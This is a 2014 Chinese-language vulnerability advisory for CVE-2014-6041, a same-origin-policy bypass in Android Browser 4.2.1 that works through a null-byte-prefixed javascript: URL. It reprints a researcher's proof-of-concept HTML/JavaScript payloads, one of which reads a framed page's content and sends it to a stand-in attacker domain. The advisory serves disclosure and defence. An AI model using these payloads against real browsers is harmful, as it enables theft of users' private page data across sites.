发布日期：2014-09-02
更新日期：2014-09-18

受影响系统：

Google Android Browser 4.2.1

描述：

---

BUGTRAQ  ID: 69548
CVE(CAN) ID: CVE-2014-6041

Android是基于Linux开放性内核的操作系统，是Google公司在2007年11月5日公布的手机操作系统。

Android浏览器应用4.2.1版本在实现上存在安全限制绕过漏洞，远程攻击者通过包含\u0000字符的构造属性，利用此漏洞可绕过同源策略。

<*来源：Rafay Baloch
  
  链接：http://xforce.iss.net/xforce/xfdb/95693
        http://1337day[.]com/exploit/22581
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Rafay Baloch （）提供了如下测试方法：

*Reading the response*


You can read the response of any page by accessing the
document.body.innerHTML property.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>


*Stealing the response and sending it to an attackers domain*


In real world situation an attacker would send the response to his
controlled domain.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')"
>

建议：

---

厂商补丁：

Google
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://code.google.com/android/

参考：https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041

浏览次数：34217
严重程度：0（网友投票）